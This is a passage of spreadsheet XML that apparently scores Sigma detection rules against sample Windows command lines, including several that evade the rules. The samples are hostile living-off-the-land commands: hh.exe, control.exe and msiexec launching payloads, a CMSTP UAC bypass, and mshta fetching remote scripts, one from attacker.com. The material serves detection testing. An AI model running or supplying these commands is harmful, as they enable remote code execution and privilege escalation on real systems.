      <c r="C1826" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1826" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1826" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\help_document.chm</t>
        </is>
      </c>
      <c r="F1826" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1826" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1826" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1826" s="36" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1826" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1826" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1827" ht="15.75" customHeight="1" s="42">
      <c r="A1827" s="36" t="n"/>
      <c r="B1827" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1827" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1827" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1827" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\APPDAT~1\Local\Temp\malicious.chm</t>
        </is>
      </c>
      <c r="F1827" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1827" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1827" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1827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827" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1827" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1828" ht="15.75" customHeight="1" s="42">
      <c r="A1828" s="36" t="n"/>
      <c r="B1828" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1828" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1828" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1828" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\Windows\System32\oobe\msoobe.chm</t>
        </is>
      </c>
      <c r="F1828" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1828" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1828" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1828" s="36" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1828" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1828" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1829" ht="15.75" customHeight="1" s="42">
      <c r="A1829" s="36" t="n"/>
      <c r="B1829" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1829" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1829" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1829" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\document.chm</t>
        </is>
      </c>
      <c r="F1829" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1829" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1829" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1829" s="36" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1829" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1829" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1830" ht="15.75" customHeight="1" s="42">
      <c r="A1830" s="36" t="n"/>
      <c r="B1830" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1830" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1830" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1830" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1830" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1830" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1830" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1830" s="36" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1830" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1830" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1831" ht="15.75" customHeight="1" s="42">
      <c r="A1831" s="36" t="n"/>
      <c r="B1831" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1831" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1831" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1831" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1831" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1831" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1831" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1831" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1831" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1831" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1832" ht="15.75" customHeight="1" s="42">
      <c r="A1832" s="36" t="n"/>
      <c r="B1832" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1832" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1832" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1832" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1832" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1832" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1832" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1832" s="43" t="n"/>
      <c r="J1832" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1832" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1833" ht="15.75" customHeight="1" s="42">
      <c r="A1833" s="36" t="n"/>
      <c r="B1833" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1833" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1833" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1833" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1833" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1833" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1833" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1833" s="36" t="n"/>
      <c r="J1833" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1833" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1834" ht="15.75" customHeight="1" s="42">
      <c r="A1834" s="36" t="n"/>
      <c r="B1834" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1834" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1834" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1834" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update_help.chm</t>
        </is>
      </c>
      <c r="F1834" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1834" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1834" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1834" s="36" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1834" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1834" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1835" ht="15.75" customHeight="1" s="42">
      <c r="A1835" s="36" t="n"/>
      <c r="B1835" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1835" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1835" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1835" s="36" t="inlineStr">
        <is>
          <t>hh.exe \\192.168.1.100\share\payload.chm</t>
        </is>
      </c>
      <c r="F1835" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1835" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1835" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1835" s="36" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1835" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1835" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1836" ht="15.75" customHeight="1" s="42">
      <c r="A1836" s="36" t="n"/>
      <c r="B1836" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1836" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1836" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1836" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update.chm</t>
        </is>
      </c>
      <c r="F1836" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1836" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1836" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1836" s="36" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1836" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1836" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1837" ht="15.75" customHeight="1" s="42">
      <c r="A1837" s="43" t="n"/>
      <c r="B1837" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1837" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1837" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1837" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\user\DOWNLO~1\malicious.chm</t>
        </is>
      </c>
      <c r="F1837" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1837" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1837" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I183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837" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1837" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1838" ht="15.75" customHeight="1" s="42">
      <c r="A1838" s="43" t="inlineStr">
        <is>
          <t>t1218.002</t>
        </is>
      </c>
      <c r="B1838" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_control_panel_item</t>
        </is>
      </c>
      <c r="C1838" s="36" t="inlineStr">
        <is>
          <t>Control Panel Items</t>
        </is>
      </c>
      <c r="D1838" s="36" t="inlineStr">
        <is>
          <t>0ba863e6-def5-4e50-9cea-4dd8c7dc46a4</t>
        </is>
      </c>
      <c r="E1838" s="43" t="inlineStr">
        <is>
          <t>control.exe C:\temp\System32\malicious.cpl</t>
        </is>
      </c>
      <c r="F1838" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1838" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1838" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1838" s="43" t="inlineStr">
        <is>
          <t>Shell32 DLL Execution in Suspicious Directory (32b96012-7892-429e-b26c-ac2bf46066ff)</t>
        </is>
      </c>
      <c r="J1838" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1838" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1839" ht="15.75" customHeight="1" s="42">
      <c r="A1839" s="43" t="inlineStr">
        <is>
          <t>t1218.002</t>
        </is>
      </c>
      <c r="B1839" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_control_panel_item</t>
        </is>
      </c>
      <c r="C1839" s="36" t="inlineStr">
        <is>
          <t>Control Panel Items</t>
        </is>
      </c>
      <c r="D1839" s="36" t="inlineStr">
        <is>
          <t>0ba863e6-def5-4e50-9cea-4dd8c7dc46a4</t>
        </is>
      </c>
      <c r="E1839" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\control.exe "C:\Users\Public\Downloads\malicious.cpl "</t>
        </is>
      </c>
      <c r="F1839" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1839" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1839" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1839" s="43" t="inlineStr">
        <is>
          <t>Shell32 DLL Execution in Suspicious Directory (32b96012-7892-429e-b26c-ac2bf46066ff)</t>
        </is>
      </c>
      <c r="J1839" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1839" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1840" ht="15.75" customHeight="1" s="42">
      <c r="A1840" s="43" t="inlineStr">
        <is>
          <t>t1218.002</t>
        </is>
      </c>
      <c r="B1840" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_control_panel_item</t>
        </is>
      </c>
      <c r="C1840" s="36" t="inlineStr">
        <is>
          <t>Control Panel Items</t>
        </is>
      </c>
      <c r="D1840" s="36" t="inlineStr">
        <is>
          <t>0ba863e6-def5-4e50-9cea-4dd8c7dc46a4</t>
        </is>
      </c>
      <c r="E1840" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\control.exe C:\Users\Public\Downloads\payload.dll</t>
        </is>
      </c>
      <c r="F1840" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1840" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1840" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1840" s="43" t="inlineStr">
        <is>
          <t>Shell32 DLL Execution in Suspicious Directory (32b96012-7892-429e-b26c-ac2bf46066ff); Potentially Suspicious Rundll32 Activity (e593cf51-88db-4ee1-b920-37e89012a3c9)</t>
        </is>
      </c>
      <c r="J1840" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1840" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1841" ht="15.75" customHeight="1" s="42">
      <c r="A1841" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B1841" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_cmstp</t>
        </is>
      </c>
      <c r="C1841" s="36" t="inlineStr">
        <is>
          <t>Bypass UAC via CMSTP</t>
        </is>
      </c>
      <c r="D1841" s="36" t="inlineStr">
        <is>
          <t>e66779cc-383e-4224-a3a4-267eeb585c40</t>
        </is>
      </c>
      <c r="E1841" s="43" t="inlineStr">
        <is>
          <t>cmstp.exe "/s" "C:\AtomicRedTeam\atomics\T1218.003\src\T1218.003_uacbypass.inf" "/au"</t>
        </is>
      </c>
      <c r="F1841" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1841" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1841" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1841" s="43" t="inlineStr">
        <is>
          <t>Bypass UAC via CMSTP (e66779cc-383e-4224-a3a4-267eeb585c40)</t>
        </is>
      </c>
      <c r="J1841" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1841" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1842" ht="15.75" customHeight="1" s="42">
      <c r="A1842" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B1842" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_cmstp</t>
        </is>
      </c>
      <c r="C1842" s="36" t="inlineStr">
        <is>
          <t>Bypass UAC via CMSTP</t>
        </is>
      </c>
      <c r="D1842" s="36" t="inlineStr">
        <is>
          <t>e66779cc-383e-4224-a3a4-267eeb585c40</t>
        </is>
      </c>
      <c r="E1842" s="36" t="inlineStr">
        <is>
          <t>cmstp.exe /s /ni "C:\AtomicRedTeam\atomics\T1218.003\src\T1218.003_uacbypass.inf"</t>
        </is>
      </c>
      <c r="F1842" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1842" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1842" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1842" s="43" t="inlineStr">
        <is>
          <t>Bypass UAC via CMSTP (e66779cc-383e-4224-a3a4-267eeb585c40)</t>
        </is>
      </c>
      <c r="J1842" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1842" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1843" ht="15.75" customHeight="1" s="42">
      <c r="A1843" s="43" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B1843" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_http</t>
        </is>
      </c>
      <c r="C1843" s="36" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D1843" s="36" t="inlineStr">
        <is>
          <t>b98d0db6-511d-45de-ad02-e82a98729620</t>
        </is>
      </c>
      <c r="E1843" s="36" t="inlineStr">
        <is>
          <t>mshta.exe javascript:a=GetObject('script:h""ttps://[raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct)').Exec();close()</t>
        </is>
      </c>
      <c r="F1843" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1843" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1843" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1843" s="43" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE (b98d0db6-511d-45de-ad02-e82a98729620); Suspicious JavaScript Execution Via Mshta.EXE (67f113fa-e23d-4271-befa-30113b3e08b1)</t>
        </is>
      </c>
      <c r="J1843" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1843" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1844" ht="15.75" customHeight="1" s="42">
      <c r="A1844" s="43" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B1844" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_http</t>
        </is>
      </c>
      <c r="C1844" s="36" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D1844" s="36" t="inlineStr">
        <is>
          <t>b98d0db6-511d-45de-ad02-e82a98729620</t>
        </is>
      </c>
      <c r="E1844" s="36" t="inlineStr">
        <is>
          <t>mshta.exe javascript:a=GetObject('script://[raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct)').Exec();close()</t>
        </is>
      </c>
      <c r="F1844" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1844" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1844" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1844" s="43" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE (b98d0db6-511d-45de-ad02-e82a98729620); Suspicious JavaScript Execution Via Mshta.EXE (67f113fa-e23d-4271-befa-30113b3e08b1)</t>
        </is>
      </c>
      <c r="J1844" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1844" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1845" ht="15.75" customHeight="1" s="42">
      <c r="A1845" s="43" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B1845" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_javascript</t>
        </is>
      </c>
      <c r="C1845" s="36" t="inlineStr">
        <is>
          <t>Suspicious JavaScript Execution Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D1845" s="36" t="inlineStr">
        <is>
          <t>67f113fa-e23d-4271-befa-30113b3e08b1</t>
        </is>
      </c>
      <c r="E1845" s="36" t="inlineStr">
        <is>
          <t>mshta.exe "java""script:a=GetObject('script:[https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct)').Exec();close()"</t>
        </is>
      </c>
      <c r="F1845" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1845" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1845" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1845" s="43" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE (b98d0db6-511d-45de-ad02-e82a98729620)</t>
        </is>
      </c>
      <c r="J1845" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1845" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1846" ht="15.75" customHeight="1" s="42">
      <c r="A1846" s="43" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B1846" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_javascript</t>
        </is>
      </c>
      <c r="C1846" s="36" t="inlineStr">
        <is>
          <t>Suspicious JavaScript Execution Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D1846" s="36" t="inlineStr">
        <is>
          <t>67f113fa-e23d-4271-befa-30113b3e08b1</t>
        </is>
      </c>
      <c r="E1846" s="36" t="inlineStr">
        <is>
          <t>mshta.exe jscript:a=GetObject('script:[https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct)').Exec();close()</t>
        </is>
      </c>
      <c r="F1846" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1846" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1846" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1846" s="43" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE (b98d0db6-511d-45de-ad02-e82a98729620)</t>
        </is>
      </c>
      <c r="J1846" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1846" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1847" ht="15.75" customHeight="1" s="42">
      <c r="A1847" s="43" t="n"/>
      <c r="B1847" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_susp_execution</t>
        </is>
      </c>
      <c r="C1847" s="36" t="inlineStr">
        <is>
          <t>MSHTA Execution with Suspicious File Extensions</t>
        </is>
      </c>
      <c r="D1847" s="36" t="inlineStr">
        <is>
          <t>cc7abbd0-762b-41e3-8a26-57ad50d2eea3</t>
        </is>
      </c>
      <c r="E1847" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\mshta.exe C:\Users\Public\Update.com &amp;&amp; C:\Users\Public\Update.com http://attacker.com/payload</t>
        </is>
      </c>
      <c r="F1847" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1847" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1847" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1847" s="43" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE (b98d0db6-511d-45de-ad02-e82a98729620); Suspicious Mshta.EXE Execution Patterns (e32f92d1-523e-49c3-9374-bdb13b46a3ba); Potential Defense Evasion Via Rename Of Highly Relevant Binaries (0ba1da6d-b6ce-4366-828c-18826c9de23e); LOL-Binary Copied From System Directory (f5d19838-41b5-476c-98d8-ba8af4929ee2); Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1847" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1847" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1848" ht="15.75" customHeight="1" s="42">
      <c r="A1848" s="43" t="n"/>
      <c r="B1848" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_susp_execution</t>
        </is>
      </c>
      <c r="C1848" s="36" t="inlineStr">
        <is>
          <t>MSHTA Execution with Suspicious File Extensions</t>
        </is>
      </c>
      <c r="D1848" s="36" t="inlineStr">
        <is>
          <t>cc7abbd0-762b-41e3-8a26-57ad50d2eea3</t>
        </is>
      </c>
      <c r="E1848" s="36" t="inlineStr">
        <is>
          <t>mshta.exe "C:\Users\Public\script.hta"</t>
        </is>
      </c>
      <c r="F1848" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1848" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1848" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1848" s="43" t="inlineStr">
        <is>
          <t>Suspicious Mshta.EXE Execution Patterns (e32f92d1-523e-49c3-9374-bdb13b46a3ba); Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba)</t>
        </is>
      </c>
      <c r="J1848" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1848" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1849" ht="15.75" customHeight="1" s="42">
      <c r="A1849" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B1849" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_dll</t>
        </is>
      </c>
      <c r="C1849" s="36" t="inlineStr">
        <is>
          <t>DllUnregisterServer Function Call Via Msiexec.EXE</t>
        </is>
      </c>
      <c r="D1849" s="36" t="inlineStr">
        <is>
          <t>84f52741-8834-4a8c-a413-2eb2269aa6c8</t>
        </is>
      </c>
      <c r="E1849" s="36" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe  /z "C:\AtomicRedTeam\atomics\T1218.007_x0008_in\MSIRunner.dll"</t>
        </is>
      </c>
      <c r="F1849" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1849" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1849" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1849" s="43" t="n"/>
      <c r="J1849" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1849" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1850" ht="15.75" customHeight="1" s="42">
      <c r="A1850" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B1850" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_dll</t>
        </is>
      </c>
      <c r="C1850" s="36" t="inlineStr">
        <is>
          <t>DllUnregisterServer Function Call Via Msiexec.EXE</t>
        </is>
      </c>
      <c r="D1850" s="36" t="inlineStr">
        <is>
          <t>84f52741-8834-4a8c-a413-2eb2269aa6c8</t>
        </is>
      </c>
      <c r="E1850" s="36" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe "/z" "C:\AtomicRedTeam\atomics\T1218.007_x0008_in\MSIRunner.dll"</t>
        </is>
      </c>
      <c r="F1850" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1850" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1850" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1850" s="43" t="n"/>
      <c r="J1850" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1850" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1851" ht="15.75" customHeight="1" s="42">
